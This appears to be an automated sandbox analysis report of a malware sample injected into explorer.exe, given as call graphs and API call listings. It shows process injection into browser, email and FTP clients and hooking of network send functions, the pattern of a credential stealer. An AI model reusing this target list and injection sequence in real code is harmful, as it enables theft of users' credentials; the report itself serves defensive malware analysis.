inet_ntoa htons 960->961 960->967 962 1916cc 961->962 961->967 962->967 985 192861 GetProcessHeap RtlAllocateHeap 962->985 964 191717 wsprintfA 965 19173a 964->965 966 192843 3 API calls 965->966 965->967 966->967 967->945 969 19151d 968->969 969->929 969->932 971 191539 970->971 972 191776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 970->972 971->939 971->942 972->971 974 19241c CryptStringToBinaryA 973->974 975 192456 973->975 974->975 976 192438 974->976 975->942 986 192861 GetProcessHeap RtlAllocateHeap 976->986 978 192444 CryptStringToBinaryA 978->975 980 192843 3 API calls 979->980 981 1915f5 980->981 982 192843 3 API calls 981->982 983 1915fc 982->983 983->942 984->955 985->964 986->978 1000 191425 1001 19144b 1000->1001 1002 191432 1000->1002 1003 192608 VirtualQuery 1002->1003 1004 19143a 1003->1004 1004->1001 1005 191493 23 API calls 1004->1005 1005->1001 1006 192806 VirtualFree 1007 191eb6 1008 191ed9 1007->1008 1009 191ecc lstrlen 1007->1009 1018 192861 GetProcessHeap RtlAllocateHeap 1008->1018 1009->1008 1011 191ee1 lstrcat 1012 191f1d 1011->1012 1013 191f16 lstrcat 1011->1013 1019 191f4a 1012->1019 1013->1012 1016 192843 3 API calls 1017 191f40 1016->1017 1018->1011 1053 1922b8 1019->1053 1023 191f77 1058 1927e2 lstrlen MultiByteToWideChar 1023->1058 1025 191f86 1059 192374 RtlZeroMemory 1025->1059 1028 191fd8 RtlZeroMemory 1030 19200d 1028->1030 1029 192843 3 API calls 1031 191f2d 1029->1031 1034 19229a 1030->1034 1036 19203b 1030->1036 1061 1922e5 1030->1061 1031->1016 1033 192280 1033->1034 1035 192843 3 API calls 1033->1035 1034->1029 1035->1034 1036->1033 1070 192861 GetProcessHeap RtlAllocateHeap 1036->1070 1038 19210b wsprintfW 1039 192131 1038->1039 1043 19219e 1039->1043 1071 192861 GetProcessHeap RtlAllocateHeap 1039->1071 1041 19216b wsprintfW 1041->1043 1042 19225d 1044 192843 3 API calls 1042->1044 1043->1042 1072 192861 GetProcessHeap RtlAllocateHeap 1043->1072 1046 192271 1044->1046 1046->1033 1047 192843 3 API calls 1046->1047 1047->1033 1048 1921e9 1049 192256 1048->1049 1073 192815 VirtualAlloc 1048->1073 1050 192843 3 API calls 1049->1050 1050->1042 1052 192243 RtlMoveMemory 1052->1049 1054 191f69 1053->1054 1055 1922c2 1053->1055 1057 192861 GetProcessHeap RtlAllocateHeap 1054->1057 1056 1926e6 2 API calls 1055->1056 1056->1054 1057->1023 1058->1025 1060 191f96 1059->1060 1060->1028 1060->1034 1063 1922f2 1061->1063 1064 192353 1061->1064 1062 1922f6 DnsQuery_W 1062->1063 1063->1062 1063->1064 1065 192335 DnsFree inet_ntoa 1063->1065 1064->1036 1065->1063 1066 192355 1065->1066 1074 192861 GetProcessHeap RtlAllocateHeap 1066->1074 1068 19235f 1075 1927e2 lstrlen MultiByteToWideChar 1068->1075 1070->1038 1071->1041 1072->1048 1073->1052 1074->1068 1075->1064

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_00191819 10 Function_00191B17 0->10 13 Function_00192608 0->13 16 Function_00191A80 0->16 1 Function_00191C19 2 Function_00191E5D 18 Function_00191D80 2->18 3 Function_0019245E 36 Function_00192861 3->36 4 Function_00191493 7 Function_00191752 4->7 21 Function_00192404 4->21 22 Function_00191647 4->22 23 Function_001917C7 4->23 37 Function_001915E0 4->37 43 Function_001926E6 4->43 5 Function_00191E93 6 Function_00192592 8 Function_001924D5 9 Function_00192815 11 Function_00193417 12 Function_00191016 12->0 12->6 12->13 27 Function_00192731 12->27 28 Function_00192573 12->28 29 Function_00191332 12->29 34 Function_001925AD 12->34 12->36 42 Function_001910A4 12->42 14 Function_00191F4A 14->9 20 Function_00192843 14->20 25 Function_001922B8 14->25 14->27 30 Function_00192374 14->30 14->36 39 Function_001927E2 14->39 41 Function_001922E5 14->41 15 Function_00192841 17 Function_00191DC0 17->1 18->1 19 Function_00191000 19->12 20->13 21->36 22->20 35 Function_001924AE 22->35 22->36 23->36 23->43 24 Function_00192806 25->43 26 Function_0019263E 29->4 29->8 29->13 29->20 29->26 29->36 38 Function_00191DE3 29->38 31 Function_00191EB6 31->14 31->20 31->36 32 Function_00191469 32->4 32->13 33 Function_00197728 37->20 38->2 38->5 38->9 38->17 40 Function_00191425 40->4 40->13 41->36 41->39 42->0 42->6 42->13 42->27 42->28 42->34 42->36

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 191016-191020 call 192608 3 191022-19104b call 192861 RtlMoveMemory 0->3 4 191097-191098 0->4 7 19104d-19106b call 192861 RtlMoveMemory 3->7 8 191071-191090 GetCurrentProcessId 3->8 7->8 12 19109e-1910d7 call 1910a4 call 192861 8->12 13 191092-191093 8->13 22 1910dc-1910ea CreateToolhelp32Snapshot 12->22 13->4 14 191095-191099 call 191332 13->14 14->12 23 1910f0-191106 Process32First 22->23 24 191322-19132d Sleep 22->24 25 19131b-19131c CloseHandle 23->25 26 19110c-19111e lstrcmpiA 23->26 24->22 25->24 27 191280-191289 call 1925ad 26->27 28 191124-191132 lstrcmpiA 26->28 34 19128b-191294 call 192592 27->34 35 191305-191313 Process32Next 27->35 28->27 29 191138-191146 lstrcmpiA 28->29 29->27 31 19114c-19115a lstrcmpiA 29->31 31->27 33 191160-19116a lstrcmpiA 31->33 33->27 36 191170-19117e lstrcmpiA 33->36 34->35 42 191296-19129d call 192573 34->42 35->26 37 191319 35->37 36->27 39 191184-191192 lstrcmpiA 36->39 37->25 39->27 41 191198-1911a6 lstrcmpiA 39->41 41->27 43 1911ac-1911ba lstrcmpiA 41->43 42->35 48 19129f-1912ac call 192608 42->48 43->27 45 1911c0-1911ce lstrcmpiA 43->45 45->27 47 1911d4-1911e2 lstrcmpiA 45->47 47->27 49 1911e8-1911f6 lstrcmpiA 47->49 48->35 53 1912ae-191300 lstrcmpiA call 192731 call 191819 call 192731 48->53 49->27 52 1911fc-19120a lstrcmpiA 49->52 52->27 54 19120c-19121a lstrcmpiA 52->54 53->35 54->27 56 19121c-19122a lstrcmpiA 54->56 56->27 57 19122c-19123a lstrcmpiA 56->57 57->27 59 19123c-19124a lstrcmpiA 57->59 59->27 61 19124c-19125a lstrcmpiA 59->61 61->27 63 19125c-19126a lstrcmpiA 61->63 63->27 65 19126c-19127a lstrcmpiA 63->65 65->27 65->35
                                                                                            APIs
                                                                                              • Part of subcall function 00192608: VirtualQuery.KERNEL32(00194434,?,0000001C), ref: 00192615
                                                                                              • Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
                                                                                              • Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00191038
                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0019106B
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00191074
                                                                                            • GetCurrentProcessId.KERNEL32(?,00191010), ref: 0019107A
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001910DF
                                                                                            • Process32First.KERNEL32(00000000,?), ref: 001910FE
                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0019111A
                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0019112E
                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00191142
                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00191156
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00191166
                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0019117A
                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0019118E
                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001911A2
                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001911B6
                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001911CA
                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001911DE
                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001911F2
                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00191206
                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00191216
                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00191226
                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00191236
                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00191246
                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00191256
                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00191266
                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00191276
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001912B4
                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0019130B
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0019131C
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 00191327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                            • String ID: 0-vP,v$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                            • API String ID: 2555639992-2153411049
                                                                                            • Opcode ID: 419c1082673728165f2931612db5603ecb043fc737db21b5f6409b0d8f3174d2
                                                                                            • Instruction ID: a5f2c5c6564a7a44ed586305d964b281ce1ba206a52308d483f52750a86250b1
                                                                                            • Opcode Fuzzy Hash: 419c1082673728165f2931612db5603ecb043fc737db21b5f6409b0d8f3174d2
                                                                                            • Instruction Fuzzy Hash: BF719030644306BBDF14EBB19C85E6F7BACBF45780B08052AFD51C3590EB35EA858A65

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
                                                                                              • Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001910DF
                                                                                            • Process32First.KERNEL32(00000000,?), ref: 001910FE
                                                                                            • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0019111A
                                                                                            • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0019112E
                                                                                            • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00191142
                                                                                            • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00191156
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00191166
                                                                                            • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0019117A
                                                                                            • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0019118E
                                                                                            • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001911A2
                                                                                            • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001911B6
                                                                                            • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001911CA
                                                                                            • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001911DE
                                                                                            • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001911F2
                                                                                            • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00191206
                                                                                            • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00191216
                                                                                            • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00191226
                                                                                            • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00191236
                                                                                            • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00191246
                                                                                            • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00191256
                                                                                            • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00191266
                                                                                            • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00191276
                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001912B4
                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0019130B
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0019131C
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 00191327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                            • API String ID: 3950187957-1680033604
                                                                                            • Opcode ID: d53d79cdae5ced4badb0084cd9ca54226e53b89694f97a0f2f9bcc6b2697b76c
                                                                                            • Instruction ID: dd50c6c8b0867a0391b6f0192ffb6123b6f0dbdb8cece8ab97d1f46ce9406e11
                                                                                            • Opcode Fuzzy Hash: d53d79cdae5ced4badb0084cd9ca54226e53b89694f97a0f2f9bcc6b2697b76c
                                                                                            • Instruction Fuzzy Hash: A4517371644306B7DF10EBB18D85E6F7BEC7F45780B48092AFD50C3080EB25EA458A76

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 113 197728-197745 114 19774b-197758 113->114 115 19790d 113->115 116 19776a-19776f 114->116 115->115 117 197771 116->117 118 197760-197765 117->118 119 197773 117->119 120 197766-197768 118->120 121 197778-19777a 119->121 120->116 120->117 122 19777c-197781 121->122 123 197783-197787 121->123 122->123 123->121 124 197789 123->124 125 19778b-197792 124->125 126 197794-197799 124->126 125->121 125->126 127 1977a8-1977aa 126->127 128 19779b-1977a4 126->128 131 1977ac-1977b1 127->131 132 1977b3-1977b7 127->132 129 19781a-19781d 128->129 130 1977a6 128->130 133 197822-197825 129->133 130->127 131->132 134 1977b9-1977be 132->134 135 1977c0-1977c2 132->135 138 197827-197829 133->138 134->135 136 1977e4-1977f3 135->136 137 1977c4 135->137 141 1977f5-1977fc 136->141 142 197804-197811 136->142 140 1977c5-1977c7 137->140 138->133 139 19782b-19782e 138->139 139->133 143 197830-19784c 139->143 144 1977c9-1977ce 140->144 145 1977d0-1977d4 140->145 141->141 146 1977fe 141->146 142->142 147 197813-197815 142->147 143->138 148 19784e 143->148 144->145 145->140 149 1977d6 145->149 146->120 147->120 150 197854-197858 148->150 151 1977d8-1977df 149->151 152 1977e1 149->152 153 19785a-197870 LoadLibraryA 150->153 154 19789f-1978a2 150->154 151->140 151->152 152->136 155 197871-197876 153->155 156 1978a5-1978ac 154->156 155->150 157 197878-19787a 155->157 158 1978ae-1978b0 156->158 159 1978d0-197900 VirtualProtect * 2 156->159 161 19787c-197882 157->161 162 197883-197890 GetProcAddress 157->162 163 1978c3-1978ce 158->163 164 1978b2-1978c1 158->164 160 197904-197908 159->160 160->160 165 19790a 160->165 161->162 166 197899-19789c 162->166 167 197892-197897 162->167 163->164 164->156 165->115 167->155
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000196000.00000040.80000000.00040000.00000000.sdmp, Offset: 00196000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_196000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d2be49d4125d28c657fab866d90be754f290eef567463cc4c3d098e12333055a
                                                                                            • Instruction ID: 63e313e7923441364e65d54262e97f9af54d2a254beb2ef95ab92c0820d26387
                                                                                            • Opcode Fuzzy Hash: d2be49d4125d28c657fab866d90be754f290eef567463cc4c3d098e12333055a
                                                                                            • Instruction Fuzzy Hash: B4512A71A6C3924FDF264AB8CC986B07BA0EF52320B1D0679C5E5CB3C6E7945C05C7A1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 168 192861-192871 GetProcessHeap RtlAllocateHeap
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0019286B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1357844191-0
                                                                                            • Opcode ID: 9667384f5bf338b543b91f1caaf15b8184dcf9e13d516b7990944baf37c495ff
                                                                                            • Instruction ID: 4ef6f030a5a87572e67b05cc0bf980f88e3bf74c5ee17faa0c20c2334d8280b0
                                                                                            • Opcode Fuzzy Hash: 9667384f5bf338b543b91f1caaf15b8184dcf9e13d516b7990944baf37c495ff
                                                                                            • Instruction Fuzzy Hash: 2CA012704001007FDD441BA0AC0FF053A28A740301F0401017119C4460896009CC8721

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00192608: VirtualQuery.KERNEL32(00194434,?,0000001C), ref: 00192615
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7591E800,microsoftedgecp.exe,?), ref: 0019184E
                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00191889
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00191919
                                                                                            • RtlMoveMemory.NTDLL(00000000,00193428,00000016), ref: 00191940
                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00191968
                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00191978
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00191992
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0019199A
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001919A8
                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001919AF
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001919C5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 001919CC
                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001919E2
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00191A0C
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00191A1F
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A26
                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A2D
                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00191A41
                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00191A58
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A65
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A6B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A71
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00191A74
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                            • String ID: 0-vP,v$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                            • API String ID: 1066286714-2027951781
                                                                                            • Opcode ID: 3f5d26df559f41feac0edeb41819c477bd4ed5ef7a63a96e58f82829ff0d1bc2
                                                                                            • Instruction ID: 6bcdaa221e4a1e9746635c5fb640b3fb856c5c828f785a7efd461f8d19830190
                                                                                            • Opcode Fuzzy Hash: 3f5d26df559f41feac0edeb41819c477bd4ed5ef7a63a96e58f82829ff0d1bc2
                                                                                            • Instruction Fuzzy Hash: DE619C31605345BFDB10DF219C84E6BBBECEB88754F04061AF959D3291DB30DE848BA2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0019265A
                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00192672
                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 0019267A
                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00192685
                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0019269F
                                                                                            • wsprintfA.USER32 ref: 001926B6
                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 001926CF
                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001926D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                            • String ID: %02X
                                                                                            • API String ID: 3341110664-436463671
                                                                                            • Opcode ID: 0f4bc79ac44d20c47d57c83b6d776197985a0f04d618d3c5b7cd8b0f67e393e7
                                                                                            • Instruction ID: 430a8dec1809ba7574a2df510e44f88d7d19584195c6bcf301136cb61b47713f
                                                                                            • Opcode Fuzzy Hash: 0f4bc79ac44d20c47d57c83b6d776197985a0f04d618d3c5b7cd8b0f67e393e7
                                                                                            • Instruction Fuzzy Hash: 111128B1900108BFDB119B99EC88EAEBFBCEB48741F144066FA25E2160D7718F91DB60

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 422 191b17-191b2c 423 191b2e 422->423 424 191b60-191b68 422->424 425 191b30-191b5e RtlMoveMemory 423->425 426 191b6a-191b6f 424->426 427 191bc3-191bcb 424->427 425->424 425->425 430 191bbe-191bc1 426->430 428 191c0b 427->428 429 191bcd-191bdf 427->429 432 191c0d-191c12 428->432 429->428 431 191be1-191bfe LdrProcessRelocationBlock 429->431 430->427 433 191b71-191b84 LoadLibraryA 430->433 431->428 434 191c00-191c04 431->434 435 191b8a-191b8f 433->435 436 191c15-191c17 433->436 434->428 437 191c06-191c09 434->437 438 191bb6-191bb9 435->438 436->432 437->428 437->431 439 191bbb 438->439 440 191b91-191b95 438->440 439->430 441 191b9c-191b9f 440->441 442 191b97-191b9a 440->442 443 191ba1-191bab GetProcAddress 441->443 442->443 443->436 444 191bad-191bb3 443->444 444->438
                                                                                            APIs
                                                                                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00191B4E
                                                                                            • LoadLibraryA.KERNEL32(?,00194434,00000000,00000000,75922EE0,00000000,00191910,?,?,?,00000001,?,00000000), ref: 00191B76
                                                                                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00191BA3
                                                                                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00191BF4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                            • String ID:
                                                                                            • API String ID: 3827878703-0
                                                                                            • Opcode ID: 1283a22bf962da21ad6ad8ccb458b28e44182d45c094c08cda5e5b6df55b6261
                                                                                            • Instruction ID: ea5c7eaea74f1fe8dbb3640dcdb1560465134cba520472ea822e2e4a4e9d0370
                                                                                            • Opcode Fuzzy Hash: 1283a22bf962da21ad6ad8ccb458b28e44182d45c094c08cda5e5b6df55b6261
                                                                                            • Instruction Fuzzy Hash: 83318E75700216BBCF28CF29C884B76B7E8BF15355B19456DE896C7600E731E885CBA0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
                                                                                              • Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0019109E,?,00191010), ref: 0019134A
                                                                                            • GetCurrentProcessId.KERNEL32(00000003,?,0019109E,?,00191010), ref: 0019135B
                                                                                            • wsprintfA.USER32 ref: 00191372
                                                                                              • Part of subcall function 0019263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0019265A
                                                                                              • Part of subcall function 0019263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00192672
                                                                                              • Part of subcall function 0019263E: lstrlen.KERNEL32(?,00000000), ref: 0019267A
                                                                                              • Part of subcall function 0019263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00192685
                                                                                              • Part of subcall function 0019263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0019269F
                                                                                              • Part of subcall function 0019263E: wsprintfA.USER32 ref: 001926B6
                                                                                              • Part of subcall function 0019263E: CryptDestroyHash.ADVAPI32(?), ref: 001926CF
                                                                                              • Part of subcall function 0019263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 001926D9
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00191389
                                                                                            • GetLastError.KERNEL32 ref: 0019138F
                                                                                            • Sleep.KERNEL32(000001F4), ref: 001913A1
                                                                                              • Part of subcall function 001924D5: GetCurrentProcessId.KERNEL32 ref: 001924E7
                                                                                              • Part of subcall function 001924D5: GetCurrentThreadId.KERNEL32 ref: 001924EF
                                                                                              • Part of subcall function 001924D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001924FF
                                                                                              • Part of subcall function 001924D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0019250D
                                                                                              • Part of subcall function 001924D5: CloseHandle.KERNEL32(00000000), ref: 00192566
                                                                                            • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 001913B8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 001913BF
                                                                                            • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 001913E4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 001913EB
                                                                                              • Part of subcall function 00191DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00191E1D
                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0019141D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_191000_explorer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                            • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                            • API String ID: 706757162-1430290102
